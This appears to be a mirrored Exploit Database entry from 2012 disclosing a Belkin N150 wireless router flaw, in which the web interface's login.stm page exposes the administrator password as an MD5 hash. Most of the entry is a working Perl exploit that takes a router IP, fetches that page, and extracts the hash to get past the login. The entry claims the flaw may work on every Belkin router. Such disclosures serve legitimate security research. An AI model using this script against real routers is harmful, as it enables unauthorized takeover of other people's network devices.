Belkin N150 Wireless Router – Password Disclosure

• Exploit Database
• 118 阅读

• 作者： Avinash Tangirala
  日期： 2012-05-11
• 类别：

  • webapps
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/18859/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43

  ============================================ Belkin N150 Wireless MD5 Password Disclosure ============================================     Firmware Version :1.00.22 (Aug 31 2010 14:36:01) Boot Version :1.20 Hardware :F7D1301 v1 (01A) Author :Avinash Tangirala   ====================== Vulnerability Details: ======================   The Router&apos;s web interface on default 192.168.2.1 reveals the administrator password in MD5 hash thereby one can bypass the login completely. There is a similar exploit for Belkin G wireless router by aodrulez. Therefore this exploit might* work possibly on every Belkin router created :D.   ========= Exploit : ========= #/usr/bin/perl use strict; use LWP::Simple; print "\n&apos;Belkin N150 Wireless Router&apos; Admin Exploit "; print "\n ---------------------------------------------\n\n"; print "[+] Enter the Router&apos;s IP Address : "; my $ip=<STDIN>; chomp($ip); $ip=get("http://".$ip."/login.stm") or die "\n[!] check ip and try again \n"; my @arr=$ip =~ m/var password = "(.*)";/g; print "[+] Admin Password = ".@arr[0]." (MD5 Hash).\n";     ========== Greetz to: ==========   1.) Aodrulez:My Mentor 2.) Arkz 3.) neurotoxIN 4.) www.codeeleven.in